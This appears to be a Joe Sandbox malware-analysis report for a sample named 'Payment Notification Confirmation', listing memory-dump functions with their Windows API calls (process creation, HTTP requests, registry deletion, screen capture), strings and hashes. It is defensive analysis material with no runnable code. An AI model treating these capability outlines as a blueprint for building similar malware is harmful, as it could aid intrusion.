Associated: 00000000.00000002.1319513809.00000000009CC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319587735.00000000009FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319609733.0000000000A04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_930000_Payment Notification Confirmation 010_01_2025.jbxd

Similarity

API ID: _wcslen$BuffCharDriveLowerType
String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
API String ID: 2055661098-1000479233
Opcode ID: 22492561af49e9382b9ff8c938f33b0d641487478012020b398cb04ed237b3a4
Instruction ID: 3a610841c8cf7c9ac907425dac806e9aa0b654df10144118cdd1e1f4e1457bd1
Opcode Fuzzy Hash: 22492561af49e9382b9ff8c938f33b0d641487478012020b398cb04ed237b3a4
Instruction Fuzzy Hash: 75B1F271A083029FC720DF28C891A7AB7E9BFE6764F50491DF496C7291E7B4D844CB92

Function 009BAFF9 Relevance: 24.4, APIs: 16, Instructions: 418processCOMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 009BB198
GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 009BB1B0
GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 009BB1D4
_wcslen.LIBCMT ref: 009BB200
GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 009BB214
GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 009BB236
_wcslen.LIBCMT ref: 009BB332

Part of subcall function 009A05A7: GetStdHandle.KERNEL32(000000F6), ref: 009A05C6

_wcslen.LIBCMT ref: 009BB34B
_wcslen.LIBCMT ref: 009BB366
CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 009BB3B6
GetLastError.KERNEL32(00000000), ref: 009BB407
CloseHandle.KERNEL32(?), ref: 009BB439
CloseHandle.KERNEL32(00000000), ref: 009BB44A
CloseHandle.KERNEL32(00000000), ref: 009BB45C
CloseHandle.KERNEL32(00000000), ref: 009BB46E
CloseHandle.KERNEL32(?), ref: 009BB4E3

Memory Dump Source

Source File: 00000000.00000002.1319441131.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true

Associated: 00000000.00000002.1319421141.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009CC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319587735.00000000009FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319609733.0000000000A04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_930000_Payment Notification Confirmation 010_01_2025.jbxd

Similarity

API ID: Handle$Close_wcslen$Directory$CurrentSystem$CreateErrorLastProcess
String ID:
API String ID: 2178637699-0
Opcode ID: 50369ae72eb91115c196adadcbb3ca81d4fe138551bfb238e58cf8b1bcef4b69
Instruction ID: 8a409974be5944b50e52df11087d2962b33cf2ffd9362017fbd86f189d2c3443
Opcode Fuzzy Hash: 50369ae72eb91115c196adadcbb3ca81d4fe138551bfb238e58cf8b1bcef4b69
Instruction Fuzzy Hash: 0DF19C715083009FC724EF24C991B6EBBE5AFC5724F14895DF8998B2A2DB71EC44CB52

Function 0093326F Relevance: 23.0, APIs: 12, Strings: 1, Instructions: 214windowCOMMON

Download Yara Rule

APIs

GetMenuItemCount.USER32(00A01990), ref: 00972F8D
GetMenuItemCount.USER32(00A01990), ref: 0097303D
GetCursorPos.USER32(?), ref: 00973081
SetForegroundWindow.USER32(00000000), ref: 0097308A
TrackPopupMenuEx.USER32(00A01990,00000000,?,00000000,00000000,00000000), ref: 0097309D
PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 009730A9

Strings

0, xrefs: 0093327D

Memory Dump Source

Source File: 00000000.00000002.1319441131.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true

Associated: 00000000.00000002.1319421141.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009CC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319587735.00000000009FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319609733.0000000000A04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_930000_Payment Notification Confirmation 010_01_2025.jbxd

Similarity

API ID: Menu$CountItem$CursorForegroundMessagePopupPostTrackWindow
String ID: 0
API String ID: 36266755-4108050209
Opcode ID: 63914d3c9f28b13555c96d951bbcf13a9434e4bb2fd87ada0f157a2661467c82
Instruction ID: fa39880908adc1bfedb65db351c61ddf9bfdec403f6e8087b9fac134b3ff5220
Opcode Fuzzy Hash: 63914d3c9f28b13555c96d951bbcf13a9434e4bb2fd87ada0f157a2661467c82
Instruction Fuzzy Hash: 8D712A71644205BFEB218F69CC49FAABF68FF45364F208216F5286A1E0C7B5AD10DB50

Function 009C6CD9 Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 194windowCOMMON

Download Yara Rule

APIs

DestroyWindow.USER32(?,?), ref: 009C6DEB

Part of subcall function 00936B57: _wcslen.LIBCMT ref: 00936B6A

CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 009C6E5F
SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 009C6E81
SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 009C6E94
DestroyWindow.USER32(?), ref: 009C6EB5
CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00930000,00000000), ref: 009C6EE4
SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 009C6EFD
GetDesktopWindow.USER32 ref: 009C6F16
GetWindowRect.USER32(00000000), ref: 009C6F1D
SendMessageW.USER32(00000000,00000418,00000000,?), ref: 009C6F35
SendMessageW.USER32(00000000,00000421,?,00000000), ref: 009C6F4D

Part of subcall function 00949944: GetWindowLongW.USER32(?,000000EB), ref: 00949952

Strings

tooltips_class32, xrefs: 009C6E58, 009C6EDD
0, xrefs: 009C6D98

Memory Dump Source

Source File: 00000000.00000002.1319441131.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true

Associated: 00000000.00000002.1319421141.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009CC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319587735.00000000009FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319609733.0000000000A04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_930000_Payment Notification Confirmation 010_01_2025.jbxd

Similarity

API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_wcslen
String ID: 0$tooltips_class32
API String ID: 2429346358-3619404913
Opcode ID: 0e9e0e345d92344dcf8ed6795d23f6f0745fa66f24b5b5d1309fd2e39b118715
Instruction ID: e5b736d78d0d6c47c9f5c05b3a6072fbd9b11ae683d28d3ba5a7ba704b5b151c
Opcode Fuzzy Hash: 0e9e0e345d92344dcf8ed6795d23f6f0745fa66f24b5b5d1309fd2e39b118715
Instruction Fuzzy Hash: FF714874904245AFDB21CF58DC48FAABBF9FF89344F44481EF99987261C770A906DB12

Function 009C911E Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 181windowfileCOMMON

Download Yara Rule

APIs

Part of subcall function 00949BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00949BB2

DragQueryPoint.SHELL32(?,?), ref: 009C9147

Part of subcall function 009C7674: ClientToScreen.USER32(?,?), ref: 009C769A
Part of subcall function 009C7674: GetWindowRect.USER32(?,?), ref: 009C7710
Part of subcall function 009C7674: PtInRect.USER32(?,?,009C8B89), ref: 009C7720

SendMessageW.USER32(?,000000B0,?,?), ref: 009C91B0
DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 009C91BB
DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 009C91DE
SendMessageW.USER32(?,000000C2,00000001,?), ref: 009C9225
SendMessageW.USER32(?,000000B0,?,?), ref: 009C923E
SendMessageW.USER32(?,000000B1,?,?), ref: 009C9255
SendMessageW.USER32(?,000000B1,?,?), ref: 009C9277
DragFinish.SHELL32(?), ref: 009C927E
DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 009C9371

Strings

@GUI_DROPID, xrefs: 009C929E
@GUI_DRAGID, xrefs: 009C92E9
@GUI_DRAGFILE, xrefs: 009C9320

Memory Dump Source

Source File: 00000000.00000002.1319441131.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true

Associated: 00000000.00000002.1319421141.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009CC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319587735.00000000009FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319609733.0000000000A04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_930000_Payment Notification Confirmation 010_01_2025.jbxd

Similarity

API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen
String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
API String ID: 221274066-3440237614
Opcode ID: d2fcb901cea9fd68ddb05694c72faebc3c9b6a721b8aa61d38a4d1d5b486cb50
Instruction ID: 3d7f06e525a864c0b62c5dfd0a2c7b846f5ab6e74e18a3d75d67532b2d3f22de
Opcode Fuzzy Hash: d2fcb901cea9fd68ddb05694c72faebc3c9b6a721b8aa61d38a4d1d5b486cb50
Instruction Fuzzy Hash: B2617A71508301AFD701DF64DD89EAFBBE8EFC9750F00491EF596922A0DB709A49CB52

Function 009AC476 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 143networkCOMMON

Download Yara Rule

APIs

InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 009AC4B0
GetLastError.KERNEL32(?,00000003,?,?,?,?,?,?), ref: 009AC4C3
SetEvent.KERNEL32(?,?,00000003,?,?,?,?,?,?), ref: 009AC4D7
HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 009AC4F0
InternetQueryOptionW.WININET(00000000,0000001F,?,?), ref: 009AC533
InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 009AC549
HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 009AC554
HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 009AC584
GetLastError.KERNEL32(?,00000003,?,?,?,?,?,?), ref: 009AC5DC
SetEvent.KERNEL32(?,?,00000003,?,?,?,?,?,?), ref: 009AC5F0
InternetCloseHandle.WININET(00000000), ref: 009AC5FB

Strings

, xrefs: 009AC575

Memory Dump Source

Source File: 00000000.00000002.1319441131.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true

Associated: 00000000.00000002.1319421141.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009CC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319587735.00000000009FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319609733.0000000000A04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_930000_Payment Notification Confirmation 010_01_2025.jbxd

Similarity

API ID: Internet$Http$ErrorEventLastOptionQueryRequest$CloseConnectHandleInfoOpenSend
String ID:
API String ID: 3800310941-3916222277
Opcode ID: ba023c2e304ac4923cc3c0fc9f648c74d48bdc088bcd6161125d854aa134c816
Instruction ID: ed98ece78364e0c0c0095acc53accc981da6f255ffe9ffe6bdb7326626a4b41a
Opcode Fuzzy Hash: ba023c2e304ac4923cc3c0fc9f648c74d48bdc088bcd6161125d854aa134c816
Instruction Fuzzy Hash: 78514DF1904605BFDB219F64C948EAB7BFCFF09754F005419F9499A610DB34EA44EBA0

Function 009C856F Relevance: 22.6, APIs: 15, Instructions: 131filecommemoryCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,00000000,?,?,?,?,?,00000000,?,000000EC), ref: 009C8592
GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 009C85A2
GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 009C85AD
CloseHandle.KERNEL32(00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 009C85BA
GlobalLock.KERNEL32(00000000), ref: 009C85C8
ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 009C85D7
GlobalUnlock.KERNEL32(00000000), ref: 009C85E0
CloseHandle.KERNEL32(00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 009C85E7
CreateStreamOnHGlobal.OLE32(00000000,00000001,000000F0,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 009C85F8
OleLoadPicture.OLEAUT32(000000F0,00000000,00000000,009CFC38,?), ref: 009C8611
GlobalFree.KERNEL32(00000000), ref: 009C8621
GetObjectW.GDI32(?,00000018,?), ref: 009C8641
CopyImage.USER32(?,00000000,00000000,?,00002000), ref: 009C8671
DeleteObject.GDI32(?), ref: 009C8699
SendMessageW.USER32(?,00000172,00000000,00000000), ref: 009C86AF

Memory Dump Source

Source File: 00000000.00000002.1319441131.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true

Associated: 00000000.00000002.1319421141.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009CC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319587735.00000000009FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319609733.0000000000A04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_930000_Payment Notification Confirmation 010_01_2025.jbxd

Similarity

API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
String ID:
API String ID: 3840717409-0
Opcode ID: bb7f3d4ed63e2ef69f218a84322bd29bb0b67947be88bf556da53a56330b11a7
Instruction ID: 7212dbe977eda524c7d3aed4c76ef8a74d8ac7a11ba0e93ff9fa649f26dc13a1
Opcode Fuzzy Hash: bb7f3d4ed63e2ef69f218a84322bd29bb0b67947be88bf556da53a56330b11a7
Instruction Fuzzy Hash: A74149B1A00204AFDB118FA5CD48EAB7BBCFF89751F104058F919E7260DB709901DB21

Function 009A14BD Relevance: 21.4, APIs: 10, Strings: 2, Instructions: 360timeCOMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(00000000), ref: 009A1502
VariantCopy.OLEAUT32(?,?), ref: 009A150B
VariantClear.OLEAUT32(?), ref: 009A1517
VariantTimeToSystemTime.OLEAUT32(?,?,?), ref: 009A15FB
VarR8FromDec.OLEAUT32(?,?), ref: 009A1657
VariantInit.OLEAUT32(?), ref: 009A1708
SysFreeString.OLEAUT32(?), ref: 009A178C
VariantClear.OLEAUT32(?), ref: 009A17D8
VariantClear.OLEAUT32(?), ref: 009A17E7
VariantInit.OLEAUT32(00000000), ref: 009A1823

Strings

Default, xrefs: 009A16AF
%4d%02d%02d%02d%02d%02d, xrefs: 009A1625

Memory Dump Source

Source File: 00000000.00000002.1319441131.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true

Associated: 00000000.00000002.1319421141.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009CC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319587735.00000000009FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319609733.0000000000A04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_930000_Payment Notification Confirmation 010_01_2025.jbxd

Similarity

API ID: Variant$ClearInit$Time$CopyFreeFromStringSystem
String ID: %4d%02d%02d%02d%02d%02d$Default
API String ID: 1234038744-3931177956
Opcode ID: 8e296d27829a31914e3bfc92fa2367bbf2ecf457eaa466ae6ecad5f4062c3455
Instruction ID: ab7f18c35ac2791aae641e04d410a22da94218a265a9c54fad58db28f7e4b34c
Opcode Fuzzy Hash: 8e296d27829a31914e3bfc92fa2367bbf2ecf457eaa466ae6ecad5f4062c3455
Instruction Fuzzy Hash: 83D12071E04605EBDB009FA5E894B7DB7B5BF86700F11885AF44AAF190DB34EC40DBA2

Function 009BB60E Relevance: 21.3, APIs: 10, Strings: 2, Instructions: 285registrylibraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 00939CB3: _wcslen.LIBCMT ref: 00939CBD

Part of subcall function 009BC998: CharUpperBuffW.USER32(?,?,?,?,?,?,?,009BB6AE,?,?), ref: 009BC9B5
Part of subcall function 009BC998: _wcslen.LIBCMT ref: 009BC9F1
Part of subcall function 009BC998: _wcslen.LIBCMT ref: 009BCA68
Part of subcall function 009BC998: _wcslen.LIBCMT ref: 009BCA9E

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 009BB6F4
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 009BB772
RegDeleteValueW.ADVAPI32(?,?), ref: 009BB80A
RegCloseKey.ADVAPI32(?), ref: 009BB87E
RegCloseKey.ADVAPI32(?), ref: 009BB89C
LoadLibraryA.KERNEL32(advapi32.dll), ref: 009BB8F2
GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 009BB904
RegDeleteKeyW.ADVAPI32(?,?), ref: 009BB922
FreeLibrary.KERNEL32(00000000), ref: 009BB983
RegCloseKey.ADVAPI32(00000000), ref: 009BB994

Strings

RegDeleteKeyExW, xrefs: 009BB8FE
advapi32.dll, xrefs: 009BB8ED

Memory Dump Source

Source File: 00000000.00000002.1319441131.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true

Associated: 00000000.00000002.1319421141.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009CC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319587735.00000000009FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319609733.0000000000A04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_930000_Payment Notification Confirmation 010_01_2025.jbxd

Similarity

API ID: _wcslen$Close$DeleteLibrary$AddressBuffCharConnectFreeLoadOpenProcRegistryUpperValue
String ID: RegDeleteKeyExW$advapi32.dll
API String ID: 146587525-4033151799
Opcode ID: 147e822deef03b50d463474671e609a2c8bc95e3da371b02314cdc38ae947195
Instruction ID: 8cc8aca95863b100c6caf86ba598ee6a14d9a98ef25e9c1cb7483e850fd403ea
Opcode Fuzzy Hash: 147e822deef03b50d463474671e609a2c8bc95e3da371b02314cdc38ae947195
Instruction Fuzzy Hash: 88C18A74208201AFD714DF14C594F6ABBE5BF84328F14849CE49A8B2A2CBB5ED45CF92

Function 009B255C Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 169windowCOMMON

Download Yara Rule

APIs

GetDC.USER32(00000000), ref: 009B25D8
CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 009B25E8
CreateCompatibleDC.GDI32(?), ref: 009B25F4
SelectObject.GDI32(00000000,?), ref: 009B2601
StretchBlt.GDI32(?,00000000,00000000,?,?,?,00000006,?,?,?,00CC0020), ref: 009B266D
GetDIBits.GDI32(?,?,00000000,00000000,00000000,00000028,00000000), ref: 009B26AC
GetDIBits.GDI32(?,?,00000000,?,00000000,00000028,00000000), ref: 009B26D0
SelectObject.GDI32(?,?), ref: 009B26D8
DeleteObject.GDI32(?), ref: 009B26E1
DeleteDC.GDI32(?), ref: 009B26E8
ReleaseDC.USER32(00000000,?), ref: 009B26F3

Strings

(, xrefs: 009B268D

Memory Dump Source

Source File: 00000000.00000002.1319441131.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true

Associated: 00000000.00000002.1319421141.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009CC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319587735.00000000009FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319609733.0000000000A04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_930000_Payment Notification Confirmation 010_01_2025.jbxd

Similarity

API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
String ID: (
API String ID: 2598888154-3887548279
Opcode ID: 6a86d5955738a4da3dfd7b560dbcbcf482672049d97637c4622ebb8675b943be
Instruction ID: aefa2a0029245dec7b8d3a6ba3b0f62d0316d4c7e3b2b38d1b0aaa996577d155
Opcode Fuzzy Hash: 6a86d5955738a4da3dfd7b560dbcbcf482672049d97637c4622ebb8675b943be
Instruction Fuzzy Hash: CE61E2B5D04219EFCF04CFA8D984EAEBBB5FF48310F24852AE959A7250D770A941DF60

Function 0096DA5D Relevance: 19.6, APIs: 13, Instructions: 114COMMONLIBRARYCODE

Download Yara Rule

APIs

___free_lconv_mon.LIBCMT ref: 0096DAA1

Part of subcall function 0096D63C: _free.LIBCMT ref: 0096D659
Part of subcall function 0096D63C: _free.LIBCMT ref: 0096D66B
Part of subcall function 0096D63C: _free.LIBCMT ref: 0096D67D
Part of subcall function 0096D63C: _free.LIBCMT ref: 0096D68F
Part of subcall function 0096D63C: _free.LIBCMT ref: 0096D6A1
Part of subcall function 0096D63C: _free.LIBCMT ref: 0096D6B3
Part of subcall function 0096D63C: _free.LIBCMT ref: 0096D6C5
Part of subcall function 0096D63C: _free.LIBCMT ref: 0096D6D7
Part of subcall function 0096D63C: _free.LIBCMT ref: 0096D6E9
Part of subcall function 0096D63C: _free.LIBCMT ref: 0096D6FB
Part of subcall function 0096D63C: _free.LIBCMT ref: 0096D70D
Part of subcall function 0096D63C: _free.LIBCMT ref: 0096D71F
Part of subcall function 0096D63C: _free.LIBCMT ref: 0096D731

_free.LIBCMT ref: 0096DA96

Part of subcall function 009629C8: RtlFreeHeap.NTDLL(00000000,00000000,?,0096D7D1,00000000,00000000,00000000,00000000,?,0096D7F8,00000000,00000007,00000000,?,0096DBF5,00000000), ref: 009629DE
Part of subcall function 009629C8: GetLastError.KERNEL32(00000000,?,0096D7D1,00000000,00000000,00000000,00000000,?,0096D7F8,00000000,00000007,00000000,?,0096DBF5,00000000,00000000), ref: 009629F0

_free.LIBCMT ref: 0096DAB8
_free.LIBCMT ref: 0096DACD
_free.LIBCMT ref: 0096DAD8
_free.LIBCMT ref: 0096DAFA
_free.LIBCMT ref: 0096DB0D
_free.LIBCMT ref: 0096DB1B
_free.LIBCMT ref: 0096DB26
_free.LIBCMT ref: 0096DB5E
_free.LIBCMT ref: 0096DB65
_free.LIBCMT ref: 0096DB82
_free.LIBCMT ref: 0096DB9A

Memory Dump Source

Source File: 00000000.00000002.1319441131.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true

Associated: 00000000.00000002.1319421141.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009CC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319587735.00000000009FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319609733.0000000000A04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_930000_Payment Notification Confirmation 010_01_2025.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast___free_lconv_mon
String ID:
API String ID: 161543041-0
Opcode ID: 4cd5128abd74de95a371ab66b9219bf5a75c02b4f987bf4fe9d7477345ed0b92
Instruction ID: a3372abadcd3e47e0412aecd45d547c0c90b149e1510162d7f12447d6bfd5528
Opcode Fuzzy Hash: 4cd5128abd74de95a371ab66b9219bf5a75c02b4f987bf4fe9d7477345ed0b92
Instruction Fuzzy Hash: 3A315831B097049FEB25AB79E945B6AB7EDFF80350F154429E469D7191DB30EC808B20

Function 0099365B Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 267windowtimeCOMMON

Download Yara Rule

APIs

GetClassNameW.USER32(?,?,00000100), ref: 0099369C
_wcslen.LIBCMT ref: 009936A7
SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 00993797
GetClassNameW.USER32(?,?,00000400), ref: 0099380C
GetDlgCtrlID.USER32(?), ref: 0099385D
GetWindowRect.USER32(?,?), ref: 00993882
GetParent.USER32(?), ref: 009938A0
ScreenToClient.USER32(00000000), ref: 009938A7
GetClassNameW.USER32(?,?,00000100), ref: 00993921
GetWindowTextW.USER32(?,?,00000400), ref: 0099395D

Strings

%s%u, xrefs: 00993734

Memory Dump Source

Source File: 00000000.00000002.1319441131.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true

Associated: 00000000.00000002.1319421141.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009CC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319587735.00000000009FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319609733.0000000000A04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_930000_Payment Notification Confirmation 010_01_2025.jbxd

Similarity

API ID: ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout_wcslen
String ID: %s%u
API String ID: 4010501982-679674701
Opcode ID: 67b0ef34e6a104a529033ce5792a9b24aa469a4b3c7cc29970c55840b06e80ec
Instruction ID: 99fe115c063a53be29460e55d7ab711ed9a20cc912dabf2cd6837d14e10da36c
Opcode Fuzzy Hash: 67b0ef34e6a104a529033ce5792a9b24aa469a4b3c7cc29970c55840b06e80ec
Instruction Fuzzy Hash: 0691B271204606EFDB19DF69C885FAAF7ACFF44354F008629F99AD2190DB30EA45CB91

Function 00994954 Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 253COMMON

Download Yara Rule

APIs

GetClassNameW.USER32(?,?,00000400), ref: 00994994
GetWindowTextW.USER32(?,?,00000400), ref: 009949DA
_wcslen.LIBCMT ref: 009949EB
CharUpperBuffW.USER32(?,00000000), ref: 009949F7
_wcsstr.LIBVCRUNTIME ref: 00994A2C
GetClassNameW.USER32(00000018,?,00000400), ref: 00994A64
GetWindowTextW.USER32(?,?,00000400), ref: 00994A9D
GetClassNameW.USER32(00000018,?,00000400), ref: 00994AE6
GetClassNameW.USER32(?,?,00000400), ref: 00994B20
GetWindowRect.USER32(?,?), ref: 00994B8B

Strings

ThumbnailClass, xrefs: 00994A6F, 00994AF1

Memory Dump Source

Source File: 00000000.00000002.1319441131.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true

Associated: 00000000.00000002.1319421141.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009CC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319587735.00000000009FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319609733.0000000000A04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_930000_Payment Notification Confirmation 010_01_2025.jbxd

Similarity

